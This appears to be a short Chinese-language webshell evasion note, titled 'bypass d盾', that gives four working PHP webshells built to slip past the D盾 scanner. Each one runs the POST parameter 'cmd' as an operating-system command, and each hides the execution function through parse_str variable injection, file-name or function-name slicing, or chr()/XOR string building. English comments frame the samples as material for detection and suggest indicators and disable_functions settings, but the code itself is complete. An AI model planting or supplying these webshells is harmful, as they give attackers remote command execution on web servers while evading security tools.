
bypass d盾

20220211 update
20200103 update

~ d盾2020.1.3免杀 ~
~ https://www.bacde.me/post/Webshellkill-Bypass-Php-Webshell/ ~

免杀(D盾2.1.6.2)
parse_str变量覆盖

<?php
// Sample analysed for detection: a command-execution webshell that never names
// an execution function. $a is not assigned anywhere in this file; it exists
// only because parse_str() injects it into the current scope.

// Request value taken as-is; nothing validates or restricts it.
$b = $_POST['cmd'];
// One-argument parse_str() imports the parsed keys as variables, so this line
// creates $a from the request value. That form was deprecated in PHP 7.2 and
// removed in PHP 8.0, so a parse_str() call without a result array is a strong
// review and scan indicator on its own.
parse_str("a=$b");
// Backticks are PHP's shell-execution operator (equivalent to shell_exec());
// the command output is written into the response. The operator is disabled
// when shell_exec is listed in disable_functions.
print_r(`$a`);

利用文件名构造函数

<?php
// Sample analysed for detection: the callable is not written in the source.
// substr(__FILE__, -10, -4) takes the six characters that sit just before the
// last four characters of this script's own path, and that string is invoked
// as a function with the raw POST value as its argument. What runs therefore
// depends on the name the file is stored under, so a content-only signature
// sees no function name at all. Indicators that remain visible in the source:
// a string expression called directly, and $_POST data passed to that call.
// Reviewing the file name together with the content closes the gap.
substr(__FILE__, -10, -4)($_POST['cmd']);

利用函数名构造函数

<?php
/**
 * Sample analysed for detection: builds a callable from this function's own name.
 *
 * __FUNCTION__ evaluates to "systema"; substr(..., -7, -1) drops the final
 * character and yields "system", which is then called with the raw POST value.
 * The function name only ever appears as part of an identifier, so a scanner
 * matching on a direct system( call does not fire; the declared function name
 * itself is the artefact to match on.
 */
function systema()
{
// Effective call: system($_POST['cmd']). Listing system in disable_functions
// blocks it regardless of how the name is assembled.
substr(__FUNCTION__, -7, -1)($_POST['cmd']);
}
// Invoked unconditionally on every request to this file; the sample contains
// no authentication or input check before the call.
systema();

php7

<?php
/**
 * Sample analysed for detection: a class with an innocuous name whose setter
 * executes its argument as an operating-system command.
 *
 * The function name is assembled at run time from chr() values and the
 * argument is read back from an object property, so neither the function name
 * nor a request superglobal appears next to the call. Calling a parenthesised
 * string expression like this requires PHP 7.0 or later.
 */
class User
{
// Holds the last value passed to setName(); the dynamic call reads it back.
public $name = '';
/**
 * Stores $a on the object and then executes it as a command.
 *
 * @param mixed $a value handed in by the caller; not validated here
 */
function setName($a){
$this->name = $a;
// Disabled variant kept by the author: each XOR pair yields one character
// ("\x13"^"`" is "s", "\x19"^"`" is "y", ...), spelling "system".
//(("\x13"^"`").("\x19"^"`").("\x13"^"`").("\x14"^"`").("\x05"^"`").("\x0d"^"`"))($this->name);
// chr(115).chr(121).chr(115).chr(116).chr(101).chr(109) is "system", so this
// line is system($this->name). Detection that evaluates constant string
// expressions (chr chains, XOR of literals) before matching catches both forms.
(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109))($this->name);
}
}
// Entry point of the sample: the raw POST parameter is passed into setName()
// with no authentication or validation. Taint analysis has to follow the value
// through the method argument and the object property to connect it to the
// dynamic call inside the class.
$user = new User;
$user->setName($_POST['cmd']);